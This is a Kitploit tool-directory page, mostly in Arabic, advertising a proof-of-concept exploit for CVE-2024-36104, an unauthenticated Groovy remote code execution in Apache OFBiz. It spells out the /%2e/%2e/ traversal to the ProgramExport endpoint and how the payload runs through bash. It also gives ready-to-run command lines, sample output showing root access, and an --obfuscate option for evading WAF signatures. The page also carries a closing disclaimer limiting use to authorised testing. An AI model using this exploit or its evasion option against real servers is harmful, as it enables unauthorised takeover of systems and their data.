Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-36104-PoC — PoC لـ CVE-2024-36104 — RCE عبر Groovy دون مصادقة في Apache OFBiz (<18.12.14) من خلال /%2e/%2e/ اجتياز مسار العرض إلى ProgramExport | Kitploit
أدوات/GitHubGitHub/groppoxx/cve-2024-36104-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubgroppoxx/cve-2024-36104-poc

CVE-2024-36104-PoC

PoC لـ CVE-2024-36104 — RCE عبر Groovy دون مصادقة في Apache OFBiz (<18.12.14) من خلال /%2e/%2e/ اجتياز مسار العرض إلى ProgramExport

عرض المستودع
3منذ 21 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-36104-PoC

إثبات المفهوم لـ CVE-2024-36104، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد دون مصادقة في Apache OFBiz قبل الإصدار 18.12.14.

يقوم ControlServlet في OFBiz بتحديد عرض غير مصادَق (forgotPassword) قبل توحيد مسار الطلب. تؤدي إضافة /%2e/%2e/ إلى عودة المسار إلى /webtools/control/، لذلك يصل الطلب إلى عرض ProgramExport دون المرور عبر فحص الأمان/الأذونات المرتبط بالعرض الأصلي. ينفّذ ProgramExport بعد ذلك كود Groovy تعسفيًا، مما يتيح تنفيذ أوامر عن بُعد دون مصادقة.

يغلّف البرنامج النصي الأمر في مقتطف Groovy يشغّله عبر /usr/bin/bash -lc، ويرسل هذا المقتطف إلى نقطة النهاية المعرضة للخطر، ويستخرج المخرجات من استثناء java.lang.Exception الذي يعيده OFBiz في استجابة HTML.

ماذا يفعل

  1. يتحقق من عنوان URL الهدف ويوحّده.
  2. يبني مسار الاجتياز /%2e/%2e/ من forgotPassword إلى ProgramExport.
  3. يغلّف الأمر في حمولة Groovy تُنفَّذ عبر Bash.
  4. يرسل الحمولة كـ groovyProgram إلى نقطة النهاية المعرضة للخطر.
  5. يحلل استجابة HTML ويستخرج مخرجات الأمر.
  6. يتراجع إلى الاستجابة الخام عند فشل التحليل أو أخطاء الخادم.

المتطلبات

root@kitploit:~
Python 3.8+

pip install -r requirements.txt

حزم Python المطلوبة:

root@kitploit:~
requests
urllib3

بدء سريع

القيم الموضوعة بين قوسين زاوية هي عناصر نائبة. استبدلها بقيمك الخاصة ولا تُدرج حرفي < أو >.

root@kitploit:~
python3 cve_2024_36104.py \
  --target <TARGET_URL> \
  --command <COMMAND>

العناصر النائبة

root@kitploit:~
<TARGET_URL>  # Target base URL. Example: https://10.129.231.23
<COMMAND>     # Command that Bash will interpret. Example: id

مثال كامل

root@kitploit:~
python3 cve_2024_36104.py \
  --target https://10.129.231.23 \
  --command "id"

مثال على المخرجات:

root@kitploit:~
[2026-05-17T18:20:10Z] [*] Target: https://10.129.231.23/webtools/control/forgotPassword/%2e/%2e/ProgramExport
[2026-05-17T18:20:10Z] [*] Host header sent: localhost
[2026-05-17T18:20:10Z] [*] Command: id
[2026-05-17T18:20:11Z] [*] HTTP status: 200
[2026-05-17T18:20:11Z] [*] Response size: 4213 bytes

[+] Output of: id
uid=0(root) gid=0(root) groups=0(root)

الخيارات الاختيارية

root@kitploit:~
-H, --host-header <HOST>
   Value of the Host header. Default: localhost

--prefix-view <VIEW>
   Unauthenticated view used before the /%2e/%2e/ traversal. Default: forgotPassword

--target-view <VIEW>
   View reached after the traversal. Default: ProgramExport

--endpoint <PATH>
   Full custom endpoint path, overrides --prefix-view/--target-view.

--timeout <SECONDS>
   Maximum HTTP request time. Default: 15

--obfuscate
   Send groovyProgram as \uXXXX escapes instead of plaintext, matching the
   encoding used in public write-ups to dodge naive WAF signatures.

--show-payload
   Print the generated Groovy code before sending it.

--show-response
   Print the full HTML response.

--only-final
   Hide progress logs and print only the command output.

--no-color
   Disable ANSI colors.

--debug
   Enable extra diagnostic logging.

ملاحظات

  • يؤثر على إصدارات Apache OFBiz قبل 18.12.14.
  • لا يتطلب أي مصادقة أو تفاعل من المستخدم.
  • إذا أعاد الخادم 502، فمن المحتمل أن الواجهة الخلفية لم تنهِ العمل قبل انتهاء مهلة الوكيل؛ وقد يظل الأمر مكتملًا على جانب الخادم.
  • استخدم --show-response لفحص HTML الخام عندما يفشل الاستخراج التلقائي.

إخلاء مسؤولية قانونية

إثبات المفهوم هذا مخصص لـ اختبار الأمان المصرح به، والبيئات المختبرية، والتحقق من الثغرات الأمنية. لا تستخدمه ضد أنظمة دون إذن صريح.

تنزيل الأداة